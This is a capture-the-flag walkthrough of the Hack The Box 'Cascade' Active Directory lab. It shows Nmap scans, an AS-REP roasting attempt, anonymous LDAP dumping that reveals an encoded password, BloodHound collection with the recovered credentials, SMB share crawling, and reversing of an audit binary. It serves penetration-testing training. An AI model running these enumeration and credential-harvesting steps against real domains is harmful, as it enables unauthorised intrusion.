Cascade is a medium difficulty Windows machine configured as a Domain Controller. LDAP anonymous binds are enabled, and enumeration yields the password for user r.thompson, which gives access to a TightVNC registry backup. The backup is decrypted to gain the password for s.smith. This user has access to a .NET executable, which after decompilation and source code analysis reveals the password for the ArkSvc account. This account belongs to the AD Recycle Bin group, and is able to view deleted Active Directory objects. One of the deleted user accounts is found to contain a hardcoded password, which can be reused to login as the primary domain administrator.
Enumeration
Scope
IP Address: 10.10.10.182
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-10 02:05:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-10T02:05:33
|_ start_date: 2024-07-10T01:57:18
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: 5s
* Open ports: 53,88,135,139,389,445,636,3268,5985
* UDP Open ports: 53- 123 - 389
* Services: DNS - KERBEROS - RPC - LDAP - SMB - winRM
* Versions: (Windows Server 2008 R2 SP1) - Microsoft DNS 6.1.7601
* Important Notes: - Domain: cascade.local
11/15 valid usernames, Let's attempt ASREP-Roasting attack against these users
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ impacket-GetNPUsers cascade.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
I got no hash from this attack, Let's switch to ldap protocol
LDAP Enumeration
I will use ldapsearch with the following flags
-x simple authentication
-b principal name
-s scope
sub subtree
'*' all
The output was too big, So I searched for Users section for anything might be helpful. there were a lot of users details but this user below has a different record cascadeLegacyPwd .
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ ldapsearch -H ldap://$ip -x -b "DC=cascade,DC=local" -s sub '*'
<snip>
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
<Snip>
cascadeLegacyPwd: clk0bjVldmE=
It's a base64 encoding , Let's decode it in our terminal
I will continue enumerate the domain with the credentials I found
Initial Access
Bloodhound-python
Fire up bloodhound.py and prepare the zip file for BloodHound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ bloodhound-python -u 'r.thompson' -p 'rY4n5eva' -ns $ip -d cascade.local -c all
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: casc-dc1.cascade.local
INFO: Found 18 users
INFO: Found 53 groups
INFO: Found 7 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CASC-DC1.cascade.local
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ zip cascade.zip *.json
Upload the data to bloodhound
SMB Credentialed Enumeration
List out the shares we have access to and In the next command I will crawl to the shares with Spider_plus Module
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat Meeting_Notes_June_2018.html
<snip>
<p>For anyone that missed yesterdays meeting (Im looking at
you Ben). Main points are below:</p>
<p class=MsoNormal><o:p> </o:p></p>
<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
<p>-- The winner of the Best GPO competition will be
announced on Friday so get your submissions in soon.</p>
There is user TempAdmin and we need to find his password.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ smbclient -U s.smith \\\\$ip\Audit$
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
let's download CascAudit.exe and examine it in dnSpy.exe
The script check of provided arguments.
if (MyProject.Application.CommandLineArgs.Count != 1)
{
Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
return;
}
RunAudit.bat shows the command and appropriate argument
We saw Tempadmin before and this record is important cascadeLegacyPwd: YmFDVDNyMWFOxxxxxxx
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat Meeting_Notes_June_2018.html
<snip>
Username is TempAdmin (password is the same as the normal admin account password). </p>
<snip>
